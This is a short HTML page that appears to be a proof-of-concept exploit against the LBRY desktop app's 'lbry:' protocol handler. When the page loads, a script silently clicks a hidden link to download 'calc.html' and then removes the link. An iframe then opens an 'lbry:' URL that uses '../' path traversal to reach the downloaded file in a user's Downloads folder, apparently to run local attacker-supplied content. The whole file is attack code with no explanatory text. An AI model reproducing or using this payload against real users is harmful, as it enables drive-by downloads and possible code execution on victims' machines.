<!DOCTYPE html>
<html>
    <body>
        <a id="downloadLink" href="calc.html" download></a >

        <script>
            // Automatically click the download link when the page loads
            window.onload = function() {
                var dd = document.getElementById("downloadLink");
                dd.click();
                document.body.removeChild(dd);
            };
        </script>
            <iframe src="lbry:../../../../../../../../../Users/jianjia/Downloads/calc.htmllbry://">
    </body>
</html>
